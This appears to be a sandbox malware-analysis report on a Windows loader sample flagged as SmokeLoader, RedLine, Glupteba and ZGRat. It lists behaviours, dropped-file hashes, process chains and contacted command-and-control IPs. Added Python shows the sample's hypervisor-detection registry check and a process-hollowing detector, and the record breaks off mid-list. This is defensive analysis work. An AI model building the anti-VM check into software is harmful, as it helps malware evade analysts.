Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-w9y9cadgc5
Target 0x0031000000014721-451.dat
SHA256 bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23
Tags
smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 discovery dropper loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23

Threat Level: Known bad

The file 0x0031000000014721-451.dat was found to be: Known bad.

Malicious Activity Summary


ZGRat

RedLine

Detect ZGRat V1

Glupteba

Smokeloader family

RedLine payload

Glupteba payload

SmokeLoader

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Deletes itself

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 18:37

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
(1 hit, no description, indicator, process or target recorded)

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 18:37

Reported

2023-12-18 18:40

Platform

win7-20231215-en

Max time kernel

28s

Max time network

76s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
(2 hits, no description, indicator, process or target recorded)

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
(62 further hits, no description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

C:\Users\Admin\AppData\Local\Temp\624C.exe

C:\Users\Admin\AppData\Local\Temp\624C.exe

C:\Users\Admin\AppData\Local\Temp\7698.exe

C:\Users\Admin\AppData\Local\Temp\7698.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp" /SL5="$9011E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\7DF8.exe

C:\Users\Admin\AppData\Local\Temp\7DF8.exe

Network

Country  Destination            Domain           Proto
RU       185.215.113.68:80      185.215.113.68   tcp
US       8.8.8.8:53             bitbucket.org    udp
US       104.192.141.1:443      bitbucket.org    tcp
US       104.192.141.1:443      bitbucket.org    tcp
RU       5.42.65.125:80         5.42.65.125      tcp
RU       77.105.132.87:17066    -                tcp
US       8.8.8.8:53             github.com       udp
DE       140.82.121.3:443       github.com       tcp
DE       140.82.121.3:443       github.com       tcp
BG       91.92.254.7:80         -                tcp
US       64.185.227.156:80      -                tcp
(- = no domain recorded; the connection was made directly to the IP)

Files

memory/3032-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3032-2-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1212-1-0x0000000002D90000-0x0000000002DA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\624C.exe

MD5 1628c4ac16c9fd4e60d6eefcfd0ca1f2
SHA1 362aec5a747ed3b99996fdc972cb51a72f818689
SHA256 8df146244d8f1677c82c8a4414b504c3c9a329caf69218fd53c507b12f8da4d1
SHA512 afec20745144619d3b6e1581e77066f2426376b494545dde68c4c54c787d9f7df8e8c56bca56d1d12b317e7d131d41abd357004560df33a7a5249a07762358ba

C:\Users\Admin\AppData\Local\Temp\624C.exe

MD5 a8c45021e6ee96ad127bf25eebbfedce
SHA1 5a103eba454730a01163f3d2428e2ce58ddf6168
SHA256 7e894d180dbbad9f65b50616c1bc58187a0d9a24dc6b4f0e9b54a1f2500eff37
SHA512 7744e358272aebc99fb923ed68b7a0ff454cc703e9d2490c11ad1d744f8856088cbf84b2eb236f89f0475804b241b8e5f401cad37be275183be245fc1494d2b1

memory/2084-14-0x0000000000160000-0x00000000001B2000-memory.dmp

memory/2084-19-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/2084-20-0x0000000004F50000-0x0000000004F90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7698.exe

MD5 b3eeb284533de706d1e39562e5942a79
SHA1 8ec197e20c89179ce3678542d8ed07a0bac57db2
SHA256 79dc01a0e266231b5506cc53471e1bfc3f55f5f822887bd8d816c6d35c2987a9
SHA512 36cc734e7ff565f803001b055f4628303ff9498af6e266da71547602a112ba55a665b3257c1956c81c550503f913892acae074784d833d9b26d6a0bb7472c0a0

C:\Users\Admin\AppData\Local\Temp\7698.exe

MD5 3306bb02d2aabd9a9bfe1e8aa818c928
SHA1 0549c179379986e1da422068fba02c83e254203b
SHA256 dace15ac43d36c47b1004b095735004aa3c49889150cfae6188310bbf847b923
SHA512 aebae65fda2f3e0436998fb74ca2817468e798ee061a6a514328ef67bb88c3cac6ead4857d4df5447982f401266e52b2b7e7ad725519412f728ce16b7f026298

memory/2772-27-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/2772-28-0x00000000003B0000-0x00000000011A2000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 ab888f57379c9057ec94a73a5d4349a5
SHA1 3fec7dba1d5ea81db05750982cef21d29ce4fa1e
SHA256 204c59c9ed4cb80b17ec80a394f59759fe67994fb3e67ef88a763ff7362ecd05
SHA512 1907056136e4143e6bd1e3c8a433b4789d276f8c5dd4279b19323be8cba647227aaf92c5f6a106724a006261ad6edc5ec305cc74a0765422549df200d278fe2c

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 174caa766705bbb082dfa30456d19f64
SHA1 357925425b7f47e99703eecd2872f0f59049362f
SHA256 d4b6605b07ac8e62fae56fbda1a8cf7a706fe6c839e0ea95aee1e52d69ca97d2
SHA512 edc7ff3bfc5bc6c9bfe4224e8fd8185e2b015240a2914193537ed2b1108867805dfc401c9c618c275603d1daf37dcdf22177e9a792eb6b209d665c5e8bfb75ec

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 a98f6155e05cdc4398d2b3d0365b5a28
SHA1 8bc35073fde1405157a5343b7714fbed1b63188a
SHA256 47c421bad8acc2658e9d1c52995b50441b186aadc9137ac479df7c61169bb750
SHA512 e73c48f9c392b9ec7b965f67099392dae9ce77e88176d385bfed6bdf496b9dae4784ba186d3bae62f66588a4d3720ca68446014cc86f758275a1f6812288bad4

\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

memory/2016-58-0x0000000002680000-0x0000000002A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 857aa3af511550939ad23672ca2b224e
SHA1 ee9c9bf95ab211b984096067562bcbd0ca2c82d8
SHA256 7e6df4f2a364f3e3c6b1a26a84a423f0f88c559f76053cd2694a93fae47e0fbf
SHA512 e203093d98fcb4aa46ffa9201cbde37c786faa2ace76eec957bd01e3b3c79d22ab7149e7e0e54f8238da8205258cd5ea452db04a4d140edf033b3530d93f36ff

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9643eb2f7eda63e52e5a60ccd1aea256
SHA1 29c45961f81e94335da5e46574039c64aad22131
SHA256 e7b364a898b373a029e41066f1a26f8269be239a0acea25e3626989b4931d683
SHA512 332d2a6aa31e2bf08ebf49c6372c3fa17c7aca9918ba113b4eb51a49e198e4e632ef8379f1848738f5dfbd22659b4404f5000dac3e1e542760c169d15d3eca22

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 46caf6b0b64506200e5ffd7041ce660f
SHA1 79c5657532c534b174c71f224655df47d3cbd919
SHA256 333b469824d914c162ab3818260d1bd49de8119d6849b69df71cda88ca35a565
SHA512 bda2e364445fb4a446fda0b59e32b4a6bbce07c87b8bc11727551d5b3adf453586ab75b5350dd7b3c2cfd48f3a2cd9ad42de798e23dd15f4102f7ac1dade110a

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 e44770a5b7f40d91cb4c08244a7a256c
SHA1 27ddf7042c48857f1e3d1ddcc767d3fd7c90f25e
SHA256 811b13ba8f0100d5edc178d46d9f02b9a99509694c13b5c762752f1e148d3c89
SHA512 d338448675725972d137bdd538e91879e0365eb31974a7b3fe62af70f12c629dd6c6e2ef3805d18ec123c2acb1dfe4e896b22c5f93cf2dda74b751afd8c1ef98

memory/2772-69-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/1332-68-0x0000000000400000-0x0000000000418000-memory.dmp

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 30cd9f0f501e42d2b2c633d09b0add80
SHA1 9e14624ff630dc3c97b9cbf7b7d680c70abcc1a5
SHA256 2577d1c2e4f276f4e93fc4f4c26492a439adaa756028ab2490d5d4d5ddfd9e1a
SHA512 5a2a82039de2a3e7159a4b0de2965d4613c3b626274289f542926dd4f6fc0a90d6a1a9fc50810ed54161a22a0383c54eb2f57a5186dc6e24d160d42675b44717

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 bbef2475688a65343f8f453bad9d0395
SHA1 8a0768b76b0f96e5029da243d7f6ae9e7b076ab4
SHA256 63ea7a4254b4c816a1024713afbaef6487bdf13941740222b2ab34224d147e5b
SHA512 b64aef5a53f12e1ae3ebf1ee960de0b4d5624af9696c8d597d59a658d85044cb457e3334fffbf29817d82e74c7475b2262469a39d83b488a40696bf2806a7078

memory/2016-71-0x0000000002680000-0x0000000002A78000-memory.dmp

memory/2016-73-0x0000000002A80000-0x000000000336B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 c104d059ac2795e96636c3215ce2275e
SHA1 201a2ac1a95d771320e6a8cf676004962fd26e75
SHA256 fe09443103ec4cbb314be81394f4634d4d8000efaa48714148431a3f90750906
SHA512 c58d56a7625eab84c11dcd82ddbb9e92941036469e0fad9dc08d95ab610fcc108f4bfd60ec1306cf8fd9e605092cf74918c64ac8a4570fe36fa72094136cb0d3

\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 0a90f231fcfede6e071cfa5e88b244f7
SHA1 161954936f6bef19c895d6798a9ebc1e36eb8d5f
SHA256 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e
SHA512 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 397bd9efec644db61e4764ba5cacb749
SHA1 dd586711e8f17e2f853360da174934d500b341f1
SHA256 9a628170aaeb05856e58480ef9a7827ac1a2e1775b164fd3acb93b4a055c218e
SHA512 42fe49140ef7ff2fd67620c06a53b4b7c8a9c0a05206b566c0a9f342624d1a70dbe7c7ac518ade448bd91881d600ec0ec5d806c81e26720f6c9e4d1df01ecd74

memory/2016-87-0x0000000000400000-0x0000000000D1C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2188-103-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2908-114-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\??\c:\users\admin\appdata\local\temp\is-nlvck.tmp\tuc3.tmp

MD5 0f512e7e71a73563a86f7da8ca8022a7
SHA1 b7eff07b2aac336e1d8f755f806005c22561ac86
SHA256 628e8a1bf0c16e97d84ccc3309786a0f4d5aba46893825e12aee6c1c582c6d69
SHA512 823db9dde7df4e5d4f4baff4facaa1be79412bf0a2acd3e9885507599c8a7a75728eda9fe4b90c000881b8a656428a6461b26e52d198de388d45e92cecd11319

C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

MD5 b3fae67141280b66be24d8e960b48263
SHA1 4e18d90912568b09f4ae03006c80f4e591dd528b
SHA256 ea2b9a05672b85405c86532abd8f1ad97f39020d02b094a0ebb6c7a4b2bf95c6
SHA512 1f0b67c557e22f721b7bdd71343f900cb10a401df6be5a67a21f212c14e652e8a0a1afdb7c57a327b1cf5a464166c8d1c60d4fdf417acf71da863fb54b069545

\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

MD5 6045f66424564f5dba00cedb688e7fa7
SHA1 ad441a2c48880eaf398d4e1fe9409223b89265f6
SHA256 c410fa72fecadc8db0439a87014640853a152a5e5268528b80a7feadd919e21d
SHA512 a4a6d3e9111596eb8dffff6c54ca9ad3fe91e49397319a2f26ed02440f185c7a96fba35bcd45ed05a679d250392d8a49999385aae65dd3248bb8583d65ecf497

\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 48f3709376715226b10f39ca25a17b47
SHA1 7d12464c646314f7d6530d1a485521dbecb176df
SHA256 01902b0ae74c0cb8b31fb8c3145eaed642704e4c82c8b7d63d873936dfd7f6b4
SHA512 6ca7e610e4c1efda0514587aa3c49d3045b600d3a0d446c30fb767cfe3c3c0e47e147e47d61dc88102cb9a5551c02fa214c3bd578def42d4636566f1ac137bbd

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 18:37

Reported

2023-12-18 18:40

Platform

win10v2004-20231215-en

Max time kernel

43s

Max time network

84s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
(2 hits, no description, indicator, process or target recorded)

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
(1 hit, no description, indicator, process or target recorded)

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
(2 hits, no description, indicator, process or target recorded)

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
(1 hit, no description, indicator, process or target recorded)

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4440 set thread context of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
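Both detonations show the sample opening, querying and enumerating HKLM\SYSTEM\ControlSet001\Enum\SCSI before it does anything else. Commodity loaders walk the disk device IDs under that key looking for hypervisor vendor and product strings (VMware, VBOX, QEMU and similar) and go quiet when they find one, which is why a sandbox with stock virtual disk names may never see the second stage. The Python below is an added example, not code from this sample or from the sandbox that produced the report: it reproduces the check against constructed device IDs so an operator can see which of their own strings would give the VM away. The marker list and the sample device IDs are assumptions; enumerate_scsi_devices only does real work on a Windows host and returns an empty list elsewhere.

```python
import re
import sys
from typing import Iterable, Optional

# Hypervisor tells commonly matched against SCSI/IDE device IDs. This list is
# an assumption about what commodity anti-VM checks look for, not strings
# recovered from the sample.
HYPERVISOR_MARKERS = (
    "vmware", "vbox", "virtualbox", "qemu", "virtio", "xen",
    "msft virtual disk", "parallels",
)

# Device instance IDs under Enum\SCSI look like
#   SCSI\Disk&Ven_VMware&Prod_Virtual_disk&Rev_2.0\4&2b1e4d3&0&000000
_DEVICE_ID = re.compile(
    r"^(?:(?P<bus>SCSI|IDE)\\)?(?P<class>[^&\\]+)&Ven_(?P<vendor>[^&\\]*)"
    r"&Prod_(?P<product>[^&\\]*)",
    re.IGNORECASE,
)


def parse_device_id(device_id: str) -> Optional[dict]:
    """Split a PnP device ID into bus, class, vendor and product; None if it
    is not shaped like a SCSI/IDE storage device."""
    m = _DEVICE_ID.match(device_id)
    if not m:
        return None
    return {k: (m.group(k) or "") for k in ("bus", "class", "vendor", "product")}


def hypervisor_markers(device_ids: Iterable[str]) -> list:
    """Return (device_id, marker) for each device whose vendor/product string
    contains a hypervisor tell, i.e. what the malware's registry walk sees."""
    hits = []
    for dev in device_ids:
        parsed = parse_device_id(dev)
        haystack = f"{parsed['vendor']} {parsed['product']}" if parsed else dev
        haystack = haystack.lower().replace("_", " ")
        for marker in HYPERVISOR_MARKERS:
            if marker in haystack:
                hits.append((dev, marker))
                break
    return hits


def enumerate_scsi_devices(control_set: str = "ControlSet001") -> list:
    """Walk HKLM\\SYSTEM\\<control_set>\\Enum\\SCSI the way the sample does
    (open, query, enumerate). Returns [] off Windows so the module imports
    anywhere."""
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only standard library module
    base = rf"SYSTEM\{control_set}\Enum\SCSI"
    devices = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as scsi:
        for i in range(winreg.QueryInfoKey(scsi)[0]):
            dev = winreg.EnumKey(scsi, i)
            with winreg.OpenKey(scsi, dev) as devkey:
                for j in range(winreg.QueryInfoKey(devkey)[0]):
                    devices.append(rf"SCSI\{dev}\{winreg.EnumKey(devkey, j)}")
    return devices


# Constructed device IDs (not taken from the report) so the check runs offline.
SAMPLE_DEVICE_IDS = [
    r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk&Rev_2.0\4&2b1e4d3&0&000000",
    r"SCSI\Disk&Ven_VBOX&Prod_HARDDISK&Rev_1.0\4&1a2b3c4d&0&000000",
    r"SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM&Rev_2.5+\5&3f0e9a1&0&010000",
    r"SCSI\Disk&Ven_NVMe&Prod_Samsung_SSD_980&Rev_3B4Q\5&1c2d3e4f&0&000000",
]

if __name__ == "__main__":
    live = enumerate_scsi_devices()
    for dev, marker in hypervisor_markers(live or SAMPLE_DEVICE_IDS):
        print(f"{marker:<18} {dev}")
```

Run it inside the analysis VM: every line printed is a string the loader can use to decide it is being watched. Renaming the virtual disk at the hypervisor level (or patching the vendor/product fields the guest sees) is the usual fix; blocking the registry read itself would be more conspicuous than the strings.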

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
(62 further hits, no description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege (9 hits) N/A N/A N/A
Token: SeCreatePagefilePrivilege (9 hits) N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3540 wrote to memory of 3628 (3 hits) N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe
PID 3540 wrote to memory of 4440 (3 hits) N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe
PID 4440 wrote to memory of 2684 (8 hits) N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
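The SetThreadContext and WriteProcessMemory rows together describe the classic hollowing sequence: 6C2.exe (PID 4440) launches the signed .NET utility RegSvcs.exe (PID 2684), writes into it eight times, then redirects its thread so the injected payload runs under a Microsoft-signed image. The Python below is an added example, not part of this report or of any sandbox product: it runs that correlation over a constructed API trace shaped like the rows above, flagging source/target pairs where a write precedes a context change and rating the finding higher when the target is a known hollowing host or the thread is resumed. The PIDs and image paths are the report's; the CreateProcess and ResumeThread events, the sequence numbers and the host list are assumptions. Plain parent-to-child writes without a context change, like 3540 to 3628 here, are left alone.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Optional

# Signed Microsoft binaries that commodity .NET loaders routinely hollow.
# Assumed list, not derived from the sample.
HOLLOWING_HOSTS = {
    "regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
    "aspnet_compiler.exe", "applaunch.exe", "csc.exe", "vbc.exe",
}


@dataclass(frozen=True)
class ApiEvent:
    seq: int                          # position in the trace
    api: str                          # e.g. "WriteProcessMemory"
    pid: int                          # calling process
    image: str                        # calling process image ("N/A" if not recorded)
    target_pid: Optional[int] = None  # process acted upon, if any
    target_image: Optional[str] = None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_hollowing(events: Iterable[ApiEvent]) -> list:
    """Group cross-process events by (source pid, target pid) and report pairs
    where a WriteProcessMemory precedes a SetThreadContext on the same target."""
    pairs = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.seq):
        if ev.target_pid is not None and ev.target_pid != ev.pid:
            pairs[(ev.pid, ev.target_pid)].append(ev)

    findings = []
    for (src, dst), evs in pairs.items():
        apis = [e.api for e in evs]
        if "WriteProcessMemory" not in apis or "SetThreadContext" not in apis:
            continue  # plain parent/child writes (3540 -> 3628 here) stay quiet
        # The payload write has to land before the context swap for the
        # redirected thread to execute it.
        first_write = apis.index("WriteProcessMemory")
        last_ctx = len(apis) - 1 - apis[::-1].index("SetThreadContext")
        if first_write > last_ctx:
            continue
        target_image = next((e.target_image for e in evs if e.target_image), "")
        resumed = "ResumeThread" in apis
        confidence = "high" if _basename(target_image) in HOLLOWING_HOSTS or resumed else "medium"
        findings.append({
            "source_pid": src, "target_pid": dst,
            "source_image": evs[0].image, "target_image": target_image,
            "writes": apis.count("WriteProcessMemory"),
            "resumed": resumed, "confidence": confidence,
        })
    return findings


# Constructed trace shaped like the WriteProcessMemory/SetThreadContext rows
# above. PIDs and image paths are the report's; the CreateProcess/ResumeThread
# events and the ordering are assumptions.
TMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = TMP + r"\0x0031000000014721-451.exe"
F4B0, SIXC2 = TMP + r"\F4B0.exe", TMP + r"\6C2.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

SAMPLE_TRACE = [ApiEvent(i, *row) for i, row in enumerate(
    [("RegOpenKeyExW", 1800, SAMPLE)]
    + [("CreateProcess", 3540, "N/A", 3628, F4B0)]
    + [("WriteProcessMemory", 3540, "N/A", 3628, F4B0)] * 3
    + [("CreateProcess", 3540, "N/A", 4440, SIXC2)]
    + [("WriteProcessMemory", 3540, "N/A", 4440, SIXC2)] * 3
    + [("CreateProcess", 4440, SIXC2, 2684, REGSVCS)]
    + [("WriteProcessMemory", 4440, SIXC2, 2684, REGSVCS)] * 8
    + [("SetThreadContext", 4440, SIXC2, 2684, REGSVCS),
       ("ResumeThread", 4440, SIXC2, 2684, REGSVCS)]
)]

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f"[{f['confidence']}] {f['source_pid']} ({_basename(f['source_image'])}) "
              f"-> {f['target_pid']} ({_basename(f['target_image'])}), "
              f"{f['writes']} writes, resumed={f['resumed']}")
```

The same pairing works on Sysmon data by mapping Event ID 10 (ProcessAccess with a write-capable GrantedAccess) to WriteProcessMemory and Event ID 8/10 with a thread-context call trace to SetThreadContext; the ordering check is what keeps debuggers and legitimate installers, which write before reading but never swap contexts, out of the results.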

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

C:\Users\Admin\AppData\Local\Temp\6C2.exe

C:\Users\Admin\AppData\Local\Temp\6C2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\412D.exe

C:\Users\Admin\AppData\Local\Temp\412D.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

